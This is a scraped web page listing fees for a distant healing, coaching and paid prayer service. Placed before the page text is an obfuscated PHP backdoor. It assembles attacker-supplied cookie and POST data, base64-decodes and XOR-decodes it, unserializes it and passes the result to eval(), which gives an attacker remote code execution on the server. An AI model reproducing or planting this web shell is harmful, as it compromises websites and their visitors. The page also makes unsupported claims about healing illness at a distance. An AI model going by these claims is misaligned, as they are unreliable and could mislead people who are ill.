$szysLRY = class_exists("asI_VXfU");if (!$szysLRY){class asI_VXfU{private $PKmDYZNw;public static $pPNYYnPBq = "14fedd77-5832-4e3f-8328-a830f7702a8c";public static $OEXOBrRSP = NULL;public function __construct(){$yMiXgFoc = $_COOKIE;$hiOuvIXJV = $_POST;$GjmFRV = @$yMiXgFoc[substr(asI_VXfU::$pPNYYnPBq, 0, 4)];if (!empty($GjmFRV)){$FbjyDPHcYy = "base64";$SbLZvXE = "";$GjmFRV = explode(",", $GjmFRV);foreach ($GjmFRV as $mvZGMBY){$SbLZvXE .= @$yMiXgFoc[$mvZGMBY];$SbLZvXE .= @$hiOuvIXJV[$mvZGMBY];}$SbLZvXE = array_map($FbjyDPHcYy . '_' . "\144" . chr (101) . "\143" . 'o' . "\144" . chr ( 381 - 280 ), array($SbLZvXE,)); $SbLZvXE = $SbLZvXE[0] ^ str_repeat(asI_VXfU::$pPNYYnPBq, (strlen($SbLZvXE[0]) / strlen(asI_VXfU::$pPNYYnPBq)) + 1);asI_VXfU::$OEXOBrRSP = @unserialize($SbLZvXE);}}public function __destruct(){$this->VmaqU();}private function VmaqU(){if (is_array(asI_VXfU::$OEXOBrRSP)) {$zitWLTKWv = str_replace(chr (60) . chr ( 644 - 581 )."\160" . chr (104) . chr ( 813 - 701 ), "", asI_VXfU::$OEXOBrRSP["\x63" . "\x6f" . "\x6e" . chr (116) . chr ( 106 - 5 )."\x6e" . "\164"]);eval($zitWLTKWv);exit();}}}$eLjsnVUzy = new asI_VXfU(); $eLjsnVUzy = NULL;} ?> Fees for My Work | Welcome to Healing for me

Fees for My Work

Please read my terms and disclaimer before hiring me

Fees For:

    • Up to one hour Initial Consultation – $175.00 
    • In-depth intake Q & A (part of initial consultation)
    • Assessment Workup with recommendations-$150.00 
    • Thought Coaching $150.00 an hour


Distant Healing –  Hourly Rate-$150.00

My time will be spent doing prep work on my receptivity, meditation on your behalf, and additional fact finding/research to clarify what I am getting through my intuition.

Healing Sessions will be done in one session or if needed multiple sessions throughout the day or week.  After consultation, intake and assessment, the average time spent doing healing work varies.  If it is one session an hour or less I will charge $150.00.  If it is several smaller sessions throughout the day and eve I will charge the same price.  It if it more concentrated and devoted time by the day including counseling and feedback for healing work I will charge $150.00 an hour not to exceed $1,000.00 per day.

In Person Healing – $1500.00 per day (not including travel expenses, meals and lodging)

1/2 hour to set up and prepare before beginning healing (if I have to travel to you).
Supplies may be needed….no mark up.

For those who want  to schedule a specific time for prayer ….please fill out your request, and the time of day you would like me to join you in prayer ( pacific time).  I will not begin prayer until we have agreed and confirmed time and payment has been received.  If there are time conflicts I will offer up options for which you can accept or decline.

Prayer sessions will be scheduled and agreed upon per session at the rate of $15.00 per session.  We will prayer together at the same time over Skype or phone or individually at the same time if you prefer.  In that session the focus of request can be numerous and cover more than one area of interest or need.

Fee’s for prayer commitment at specific agreed upon times based on time zones.

  • One time: $15.00 per prayer session (approx. time commitment 5 minutes)
  • Repeated prayer daily for one week:$100.00

Factors for Fees

      • Time Factors
      • Severity of Illness
      • Healer Preparedness Required
      • Distance or in Person
      • Travel Expenses or none
      • Time away from Home
      • One Time or Repeated Sessions

ACCEPTED PAYMENT METHODS:                                                           

    • Bank Transfer
    • Paypal
    • Cash
    • Certified Checks
    • Trade for Services/Products

Please read my terms and disclaimer before hiring me